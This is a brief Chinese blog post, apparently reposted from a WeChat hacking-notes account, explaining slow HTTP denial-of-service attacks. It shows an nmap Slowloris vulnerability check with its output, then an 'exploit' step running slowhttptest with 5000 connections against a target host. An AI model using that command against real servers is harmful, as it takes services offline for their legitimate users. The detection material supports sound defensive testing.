🇨🇳什么是缓慢DOS攻击
并非所有的DOS攻击都是以大流量进行攻击,而缓慢DOS攻击中的“慢”,自然相对于这些“快”。通俗些来说,就是攻击者向服务器发送多个并发TCP连接。服务器是在所有请求被完全接受后才会断开TCP连接,这些连接便以很低的速度发包。于是服务器资源被长期占用,无法处理其他正常用户的请求。自然就达成了DOS攻击的目的。且这种攻击模式相对廉价,只需一台普通PC即可,无需传统DOS攻击中需要结合肉鸡群做分布式DOS。
⚽检测
我们可以利用nmap工具直接扫描。命令如下:
nmap --script http-slowloris-check ip
返回结果如下:
PORT STATE SERVICE REASON
80/tcp open http syn-ack
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
🎯利用
在kali中,我们直接按照工具 执行命令
apt-get install slowhttptest
exploit
slowhttptest -c 5000 -u [hostname/ip]
📦总结
慢速ddos攻击,相对于其他的ddos就比较简单多了。但是效果也只能针对有此漏洞的目标。
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):浅谈慢速DOS攻击
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论